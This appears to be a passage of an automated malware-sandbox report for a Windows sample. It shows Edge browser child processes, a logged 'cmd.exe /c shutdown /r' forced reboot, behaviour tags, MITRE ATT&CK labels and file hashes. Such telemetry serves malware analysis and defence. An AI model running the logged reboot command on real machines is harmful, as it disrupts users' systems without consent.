C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4304 /prefetch:84⤵PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5560 /prefetch:84⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:14⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:14⤵PID:5988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:14⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:14⤵PID:4288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:14⤵PID:2204
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r2⤵
- System Location Discovery: System Language Discovery
PID:5536 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5344
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4840
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3028
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3384
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2012
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:6136
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3963855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3464
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Indicator Removal
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD51fc959921446fa3ab5813f75ca4d0235
SHA10aeef3ba7ba2aa1f725fca09432d384b06995e2a
SHA2561b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c
SHA512899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06
-
Filesize
152B
MD5e9a2c784e6d797d91d4b8612e14d51bd
SHA125e2b07c396ee82e4404af09424f747fc05f04c2
SHA25618ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6
SHA512fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD539ae39c20393fe4d4d10660a2a5afbae
SHA1881bea76cd0b3a82d9ccebe0d274ca7fc0e07331
SHA256a5244ac453c9cba51453394051e2500662e7781ce6992ca47fa796efaa41bb1f
SHA512605e6bb6e18fec2ef15ca885449bd0590546d5271f0c2060be372910c1b023f42761e093beb09d274c6b1cbe1baf8ed73fbbc2accc084077c3d778da5f5ee655
-
Filesize
1KB
MD5261f4b8973461c839950cd319ce25f9b
SHA16db12a8fb6d35403accb13aab871357dcb6c2986
SHA256a67f04dcc9f0b510dab9f97fa59d2fb9e5dd29f88ab0ff9548c09457b0d7109e
SHA51259b7fbbc5758326f5a37958d213cd3b597ad23645aac5dc3d3c6b45bd3001af2bd2db1fe4e82ec6c9248733a3e960d3c577372d4abf24a9b2b9c9d7adb124ae9
-
Filesize
7KB
MD5f787c2ccd3eafb643d8204461a62ebc7
SHA18d3beef31155fd374ad3176e21dac3f734609346
SHA256fc52d47012c87dfdc3bbd51584e1f3806c5dcc57085ea74550c15d4cb44e3f09
SHA512f59cef69ef030d2960c5712d3ecea6b1854fb62ac753f6da6a96e1c8e553a27f0205bbfca4a28cf45b810a73c69085f50bfac115420642f4fe7623fd1fdfae69
-
Filesize
8KB
MD55ec4f296ad33e9264799e23acb0bf836
SHA165ddab1c83c9ae0a9654c79e338104f7ebe36bf5
SHA25625bf95258463e0d7b6d3c3919ff852436cf6947be8d6bdaa23f0ff3c3565ddcf
SHA51284481f0b18c1506c78d322c6301002fa4aab1d25c5da947611ed1c88e59d7ce00f54d83f236e49b484657d31d24d8c599e3b95da79f0dbc3c1d014cb82a1ecf1
-
Filesize
5KB
MD5a91a5fcb996568974e5e95f32da4ef46
SHA10bad6a870b84ff74d7ddecd8737c3c5c68902be0
SHA25669798782aa12886229631a6296ad1172a566fa028f7b73a5fd63b711b143116b
SHA5124be596ae29640880b8ab0639f8574625cf648d88609b5ebc23c5fe0b27b8bc79d8ea57927cd9211b6228a640455fd3345f50f6e963e3a8d66105348c9825e22b
-
Filesize
2KB
MD50d6a29583ac035368732781f6052d93d
SHA123e6580cb4a9f4ccba8a4a215a06a2f16c38e506
SHA256876c5cb2c2374b4fe513af1c81f67839fc4e51c4eb9697695b952cc3c4035cdd
SHA512e99ed06d759ba878e8cf7ec4786d7892d6320731d95946fc49cffd73163604d51c7ca435b189df3f74ac991dc57528d928a4f29c660a04bbf5f1c8ca3c937192
-
Filesize
2KB
MD535afed088810ac6a2676153d761f1c6b
SHA198dc9dc9cdfe87cde826e5a9c180ba4650559e41
SHA256abf6fee354bbd29f4a44f8527645262e68364f955fc4dcc63f4aed638297f78d
SHA512de10baba855ed528eeb2a9f36b11630c9021c5a02bca2873069233131fd8ce874fa3c475cd4ef321eab6b2007c844860854b19c1fa044ee5f68ce3b9271cb248
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
8KB
MD5c1b8552aa498cfe87871d514578f2151
SHA1d095ff3f0e9bc4fde468b027e466a67b29b3fa64
SHA256e3ae816bf2fb60d549062493d8590bcf48ec395a6b062c9a50b0356fd320baa8
SHA512ef13862086502c6fad1c5656d5c9c9be3757b0a2ba9bde96b13ecfb95a49b235e472068c937189e292f7035636139da0e426e63e7edb5772b3f8fd17fe3773e4
-
Filesize
10KB
MD538a9138e280d0b143cae98f09fd43a31
SHA159afd35c057d5e49c5e39a000adfbb8ae6370089
SHA2564b96726b09eb1fae38ba0a4a0f94fb2b66a84b7ae215b30fff4ac99c0ed74f8f
SHA512fab8336cbd21d5e2166e30b0b277f1d8bdc4690d19f2212900b5fb7e826a21429d4147329eae795966e35f8be7d113f1cf118c2d10de24aeb05d22ceb4dd83bf
-
Filesize
10KB
MD5495c43e2f78f09eac83f639cef2b8a23
SHA13b25858c3aabb3bc392bb8000ef8035f22485812
SHA2568126d9cbfef903337124be0217d44ecaeae6465045b08366b9380498fb1a2dda
SHA512086c7308543e5e4802e83f230b1f2ad3496624cdb3e998521e0441b7c8be0c7921a59d2fee4fd969a2a87cd8b7847380e525f50628d357df1cac4edcf66deecb